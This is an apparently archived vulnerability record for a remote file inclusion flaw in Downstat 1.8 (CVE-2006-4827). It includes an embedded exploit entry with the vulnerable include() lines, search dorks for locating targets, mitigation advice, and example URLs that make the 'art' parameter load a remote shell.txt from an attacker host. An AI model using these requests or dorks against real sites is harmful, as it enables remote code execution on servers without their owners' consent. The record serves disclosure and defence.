ID OSVDB:28780
Type osvdb
Reporter OSVDB
Modified 2006-09-13T09:18:59
Description
Manual Testing Notes
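http://[target]/downstat1.8/chart.php?art=http://[attacker]/shell.txt?
Note: chart.php uses the request-supplied "art" variable as the prefix of a PHP include path, so a remote URL passed in it is fetched and executed as PHP. Per CVE-2006-4827 the same pattern affects admin.php, modes.php and stats.php in Downstat 1.8 and earlier, and exploitation requires "register_globals" to be enabled. Keeping register_globals off, and disabling remote URL includes in the PHP configuration (allow_url_include / allow_url_fopen), prevents this request from reaching the include.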
References:
Secunia Advisory ID:21914
Generic Exploit URL: http://milw0rm.com/exploits/2359
FrSIRT Advisory: ADV-2006-3594
CVE-2006-4827
Bugtraq ID: 20007
{"type": "osvdb", "published": "2006-09-13T09:18:59", "href": "https://vulners.com/osvdb/OSVDB:28780", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 5.1}, "viewCount": 1, "edition": 1, "reporter": "OSVDB", "title": "Downstat chart.php art Variable Remote File Inclusion", "affectedSoftware": [], "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2017-04-28T13:20:25", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4827"]}, {"type": "exploitdb", "idList": ["EDB-ID:2359"]}], "modified": "2017-04-28T13:20:25", "rev": 2}, "vulnersScore": 6.6}, "references": [], "id": "OSVDB:28780", "lastseen": "2017-04-28T13:20:25", "cvelist": ["CVE-2006-4827"], "modified": "2006-09-13T09:18:59", "description": "## Manual Testing Notes\nhttp://[target]/downstat1.8/chart.php?art=http://[attacker]/shell.txt?\n## References:\n[Secunia Advisory ID:21914](https://secuniaresearch.flexerasoftware.com/advisories/21914/)\nGeneric Exploit URL: http://milw0rm.com/exploits/2359\nFrSIRT Advisory: ADV-2006-3594\n[CVE-2006-4827](https://vulners.com/cve/CVE-2006-4827)\nBugtraq ID: 20007\n", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:27:24", "description": "Multiple PHP remote file inclusion vulnerabilities in Vmist Downstat 1.8 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the art parameter to (1) admin.php, (2) chart.php, (3) modes.php, or (4) stats.php.\nSuccessful exploitation requires that \"register_globals\" is enabled.", "edition": 6, "cvss3": {}, "published": "2006-09-15T22:07:00", "title": "CVE-2006-4827", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4827"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:vmist:downstat:1.3", "cpe:/a:vmist:downstat:1.2", "cpe:/a:vmist:downstat:1.7", "cpe:/a:vmist:downstat:1.6", "cpe:/a:vmist:downstat:1.5", "cpe:/a:vmist:downstat:1.4", "cpe:/a:vmist:downstat:1.8"], "id": "CVE-2006-4827", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4827", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmist:downstat:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmist:downstat:1.8:*:*:*:*:*:*:*", "cpe:2.3:a:vmist:downstat:1.7:*:*:*:*:*:*:*", "cpe:2.3:a:vmist:downstat:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmist:downstat:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmist:downstat:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmist:downstat:1.5:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T16:05:21", "description": "Downstat <= 1.8 (art) Remote File Include Vulnerability. CVE-2006-4827. 
Webapps exploit for php platform", "published": "2006-09-13T00:00:00", "type": "exploitdb", "title": "Downstat <= 1.8 art Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4827"], "modified": "2006-09-13T00:00:00", "id": "EDB-ID:2359", "href": "https://www.exploit-db.com/exploits/2359/", "sourceData": "DESCRIPTION: Remote file include vuln found by sZ [sept, 8 2006.]\nSOFTWARE: downstat 1.8\nVENDOR URL: http://vmist.net/index.php?script=Downstat\nDORKs:\n\"Login To Downstat 1.8\"\nallinurl:\"/downstat/\"\n \n\nNOTES: greetz to: neo-vortex, sk0tie, icez. visit @ irc.bluehell.org #silenz\n \n\nVULN CODE:\n------\nadmin.php:\n \nif(!@include($art.\"in_php.php\")) exit(\"upload \".$art.\"in_php.php\");\n \n------\nchart.php:\n \nif(!@include($art.\"downstat_art/in_html.php\")){ exit(\"upload \".$art.\"in_html.php\"); }\n------\nmodes.php\n \nif(!@include($art.\"downstat_art/in_html.php\")){ exit(\"upload \".$art.\"in_html.php\"); } \n-----\nstats.php\n \nif(!@include($art.\"downstat_art/in_html.php\")){ exit(\"upload \".$art.\"in_html.php\"); }\n----\n \n\nEXAMPLE:\nhttp://site.com/downstat1.8/chart.php?art=http://silenz.be/shell.txt?\n\n# milw0rm.com [2006-09-13]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2359/"}]}